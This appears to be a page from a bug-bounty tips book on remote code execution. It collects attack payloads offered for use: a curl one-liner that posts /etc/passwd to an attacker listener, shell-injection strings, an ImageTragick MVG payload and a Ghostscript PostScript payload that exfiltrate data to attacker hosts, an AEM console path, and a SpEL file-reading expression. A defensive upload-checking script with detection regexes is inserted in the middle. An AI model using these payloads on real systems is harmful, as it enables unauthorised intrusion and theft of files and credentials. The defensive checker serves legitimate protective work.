Book of BugBounty Tips

Remote Code Execution (RCE)


Last updated 1 month ago

If the server only allows the GET and POST methods, try adding the header "X-HTTP-Method-Override: PUT" to achieve RCE via the PUT method.
Blind RCE - grabs /etc/passwd and dumps it to your netcat listener via POST: cat /etc/passwd | curl -X POST -d @- http://yourip:yourport/
Found an endpoint which is doing something with images? Give this a shot > request=input&&id , request=input|id , request=input`id` or you can even set up a NC & try request=input&&http://wgetyourserver.com:port & so on. Fuzz Fuzz Fuzz #InfoSecurity #Infosec #BugBounty
If you ever get the ability to run arbitrary Python code on a server, try to get RCE by running: import os;os.system("ls"), replacing "ls" with any number of shell commands.
Recon to RCE: Google "upload" site:"target" -> upload form -> ImageTragick MVG -> RCE PoC: push graphic-context viewbox 0 0 200 200 fill 'url(https://example.123 "|curl -d "@/etc/passwd" -X POST https://xxx.burpcollaborator.net/test1")' pop graphic-context
RCE on PDF upload: Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf" Content-Type: application/pdf %!PS currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64…) ) .putdeviceparams quit #BugBounty
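A defender-side check for the two upload tips above (the ImageTragick MVG file served as an image and the PostScript file named .pdf), added here as example code that is not from the book; the MIME table, regexes and sample blobs are constructed for illustration:

```python
import re
from typing import Tuple

# Magic bytes a legitimate upload of each declared type must start with.
# Constructed for this example; extend for the types your endpoint accepts.
MAGIC = {
    "application/pdf": [b"%PDF-"],
    "image/png": [b"\x89PNG\r\n\x1a\n"],
    "image/jpeg": [b"\xff\xd8\xff"],
    "image/gif": [b"GIF87a", b"GIF89a"],
}

# Text markers that should never appear in a raster image or PDF upload:
# a PostScript header (Ghostscript runs it regardless of the .pdf name),
# MVG drawing commands, and the ImageMagick/Ghostscript delegate syntax.
SUSPICIOUS = [
    re.compile(rb"^\s*%!PS", re.I),
    re.compile(rb"push\s+graphic-context", re.I),
    re.compile(rb"%pipe%", re.I),
    re.compile(rb"url\s*\(", re.I),
    re.compile(rb"\.putdeviceparams", re.I),
]

def check_upload(declared_type: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). Accept only if the content's magic bytes
    match the declared MIME type and no interpreter-directed text is present."""
    sigs = MAGIC.get(declared_type)
    if sigs is None:
        return False, f"type not allowed: {declared_type}"
    if not any(data.startswith(s) for s in sigs):
        return False, f"magic bytes do not match {declared_type}"
    head = data[:4096]  # these payloads sit in the leading bytes
    for pat in SUSPICIOUS:
        if pat.search(head):
            return False, f"rejected: matched {pat.pattern.decode()}"
    return True, "ok"

# Constructed samples mirroring the two tips: a PostScript file uploaded as
# "pwn.pdf", an MVG script uploaded as a PNG, and a benign PDF header.
SAMPLES = {
    "ps_as_pdf": ("application/pdf", b"%!PS\ncurrentdevice null true mark\n"),
    "mvg_as_png": ("image/png", b"push graphic-context\nviewbox 0 0 200 200\n"),
    "real_pdf": ("application/pdf", b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\n"),
}

if __name__ == "__main__":
    for name, (ctype, blob) in SAMPLES.items():
        print(name, check_upload(ctype, blob))
```

Pair this with re-encoding uploads through a sandboxed converter and an ImageMagick policy.xml that disables the MVG, MSL, URL and PS coders, since signature checks alone do not stop a crafted file that starts with valid magic bytes.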
Does the target use AEM? Try this path: target[.]com/etc/groovyconsole.html and use the payload in the pic. If you're lucky enough you can have a nice RCE ;) Good luck :) #bugbounty #bugcrowd #bugbountytips
If you can get SpEL injection but can't get RCE, try exfiltrating a file with B64 encoding: T(java.util.Base64).getEncoder().encodeToString(T(org.apache.commons.io.FileUtils).readFileToString('/proc/self/cmdline').getBytes())